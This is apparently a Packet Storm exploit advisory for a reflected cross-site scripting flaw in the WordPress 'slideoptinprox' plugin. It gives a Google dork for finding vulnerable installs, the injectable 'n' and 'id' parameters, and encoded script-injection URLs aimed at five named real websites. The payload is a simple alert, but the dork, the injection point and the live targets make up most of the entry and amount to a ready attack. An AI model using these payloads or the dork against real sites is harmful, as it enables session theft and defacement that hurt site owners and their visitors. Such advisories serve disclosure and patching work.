WordPress Slideoptinprox Cross Site Scripting

2015-01-09T00:00:00
ID PACKETSTORM:129873
Type packetstorm
Reporter 4L1R3Z4
Modified 2015-01-09T00:00:00

Description

                                        
                                            `|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
|[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site   
scripting vulnerability  
|  
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"  
|  
|[*] Date : Date: 2015-01-08  
|  
|[*] Exploit Author: Ashiyane Digital Security Team  
|  
|[*]Vendor Homepage : https://pluginu.com/slideoptinprox/  
|  
|[*] Tested on: Windows 8.1,Kali Linux  
|  
|-------------------------------------------------------------------------|  
|  
|[*] Location :  
[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]  
|  
|-------------------------------------------------------------------------|  
|[*] Proof:  
|  
|[*]  
http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
|  
|[*]  
http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E|  
|-------------------------------------------------------------------------|  
|[*] Discovered By : 4L1R3Z4 |  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`